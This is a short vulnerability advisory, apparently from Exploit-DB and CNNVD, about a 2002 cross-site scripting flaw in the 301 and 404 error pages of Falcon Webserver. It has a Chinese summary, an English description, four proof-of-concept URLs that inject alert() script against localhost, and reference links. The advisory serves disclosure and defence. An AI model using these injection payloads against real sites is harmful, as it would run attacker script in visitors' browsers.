https://www.exploit-db.com/exploits/21698
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-092

Falconwebserver2.0.0.1009到2.0.0.1021版本存在跨站脚本（XSS）漏洞。远程攻击者借助URI注入任意web脚本或者HTML，该漏洞插入到301出错消息和被404出错消息执行。

source: http://www.securityfocus.com/bid/5435/info

Falcon Webserver does not sufficiently sanitize HTML tags from error message output. In particular, attackers may inject HTML into 301 and 404 error pages. 

It is possible to create a malicious link to the server which will generate an error page with attacker-supplied HTML and script code when visited. Arbitrary HTML and script code will be executed by the web client of the user visiting the server, in the security context of the server.


* 301 Message XSS

Closing TITLE tag:
http://localhost/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
Closing A HREF:
http://localhost/%22%3cscript%3ealert(%22xss%22)%3c/script%3e
Closing A tag:
http://localhost/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

* 404 Message XSS

http://localhost/%3cscript%3ealert(%22xss%22)%3c/script%3e/

The 301 examples will simply add a slash and pass it on to the browser,
which then raises a 404, exploiting that vulnerability as well (although the
301 exploits will cause some useless HTML to be added on)

来源:BID
名称:5435
链接:http://www.securityfocus.com/bid/5435
来源:XF
名称:falcon-error-msg-xss(9812)
链接:http://www.iss.net/security_center/static/9812.php
来源:BUGTRAQ
名称:20020808Cross-SiteScriptingIssuesinFalconWebServer
链接:http://seclists.org/lists/bugtraq/2002/Aug/0158.html
来源:FULLDISC
名称:20020808Cross-SiteScriptingIssuesinFalconWebServer
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2002-August/000934.html